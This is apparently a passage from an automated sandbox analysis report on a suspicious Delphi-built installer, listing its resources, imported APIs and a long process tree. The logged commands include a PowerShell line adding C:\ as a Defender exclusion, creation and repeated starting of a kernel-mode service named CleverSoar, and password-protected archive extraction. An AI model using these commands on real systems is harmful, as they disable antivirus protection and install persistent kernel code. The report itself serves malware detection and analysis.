                          RT_STRING | 0xda4ec | 0x398 | data | - | - | 0.3358695652173913
                          RT_STRING | 0xda884 | 0x368 | data | - | - | 0.3795871559633027
                          RT_STRING | 0xdabec | 0x2a4 | data | - | - | 0.4275147928994083
                          RT_RCDATA | 0xdae90 | 0x10 | data | - | - | 1.5
                          RT_RCDATA | 0xdaea0 | 0x310 | data | - | - | 0.6173469387755102
                          RT_RCDATA | 0xdb1b0 | 0x2c | data | - | - | 1.2045454545454546
                          RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447
                          RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.2769121813031161
                          RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
                          DLL | Import
                          kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                          comctl32.dll | InitCommonControls
                          user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                          oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                          advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                          Name | Ordinal | Address
                          __dbk_fcall_wrapper | 2 | 0x40fc10
                          dbkFCallWrapperAddr | 1 | 0x4b063c
                          Language of compilation system | Country where language is spoken | Map
                          English | United States | -
                          No network behavior found

                          Target ID:0
                          Start time:00:23:27
                          Start date:24/12/2024
                          Path:C:\Users\user\Desktop\cVyexkZjrG.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\cVyexkZjrG.exe"
                          Imagebase:0x580000
                          File size:7'370'578 bytes
                          MD5 hash:4E1927F742599F95F0D9450B4B8C2C80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:true

                          Target ID:2
                          Start time:00:23:27
                          Start date:24/12/2024
                          Path:C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp" /SL5="$20428,6416153,845824,C:\Users\user\Desktop\cVyexkZjrG.exe"
                          Imagebase:0xc00000
                          File size:3'366'912 bytes
                          MD5 hash:0195248B8EBF37D072592944E7488FC4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:true

                          Target ID:3
                          Start time:00:23:27
                          Start date:24/12/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                          Imagebase:0x7ff7be880000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:00:23:27
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:5
                          Start time:00:23:31
                          Start date:24/12/2024
                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Imagebase:0x7ff6ef0c0000
                          File size:496'640 bytes
                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                          Has elevated privileges:true
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:6
                          Start time:00:23:36
                          Start date:24/12/2024
                          Path:C:\Users\user\Desktop\cVyexkZjrG.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\cVyexkZjrG.exe" /VERYSILENT
                          Imagebase:0x580000
                          File size:7'370'578 bytes
                          MD5 hash:4E1927F742599F95F0D9450B4B8C2C80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:false

                          Target ID:7
                          Start time:00:23:36
                          Start date:24/12/2024
                          Path:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp" /SL5="$40436,6416153,845824,C:\Users\user\Desktop\cVyexkZjrG.exe" /VERYSILENT
                          Imagebase:0xc0000
                          File size:3'366'912 bytes
                          MD5 hash:0195248B8EBF37D072592944E7488FC4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:true

                          Target ID:8
                          Start time:00:23:38
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:9
                          Start time:00:23:38
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:10
                          Start time:00:23:38
                          Start date:24/12/2024
                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                          Wow64 process (32bit):true
                          Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                          Imagebase:0xb30000
                          File size:831'200 bytes
                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 0%, Virustotal
                          • Detection: 0%, ReversingLabs
                          Reputation:moderate
                          Has exited:true

                          Target ID:11
                          Start time:00:23:38
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:12
                          Start time:00:23:38
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:13
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                          Wow64 process (32bit):true
                          Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                          Imagebase:0xb30000
                          File size:831'200 bytes
                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:14
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:15
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:16
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:17
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:18
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:19
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:20
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:21
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:22
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:23
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:24
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:25
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:26
                          Start time:00:23:39
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:27
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:28
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:29
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:30
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:31
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:32
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:33
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:34
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:35
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:36
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:37
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:38
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:39
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:40
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:41
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:42
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:43
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:44
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:45
                          Start time:00:23:40
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:46
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:47
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:48
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:49
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:50
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:51
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:52
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:53
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:54
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:55
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:56
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:57
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff7c9ce0000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:58
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6e0e60000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:59
                          Start time:00:23:41
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
